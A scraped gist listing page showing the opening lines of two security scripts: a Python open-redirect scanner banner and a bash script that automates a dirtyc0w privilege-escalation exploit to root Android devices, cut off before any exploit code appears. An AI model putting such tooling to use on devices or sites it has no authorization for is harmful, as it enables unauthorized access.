Skip to content

Instantly share code, notes, and snippets.

import requests
import sys
import time
import os
os.system('clear')
print "#################################################"
print "# Open redirect Scanner for dummies like me :) #"
print "# by ak1t4 (know.0nix@gmail.com) #"
@th3gundy
th3gundy / root.sh
Created November 4, 2016 10:01 — forked from Arinerron/root.sh
"Root" via dirtyc0w privilege escalation exploit (automation script) / Android (32 bit)
#!/bin/bash
# Give the usual warning.
clear;
echo "[INFO] Automated Android root script started.\n\n[WARN] Exploit requires sdk module \"NDK\".\nFor more information, visit the installation guide @ https://goo.gl/E2nmLF\n[INFO] Press Ctrl+C to stop the script if you need to install the NDK module. Waiting 10 seconds...";
sleep 10;
clear;
# Download and extract exploit files.
echo "[INFO] Downloading exploit files from GitHub...";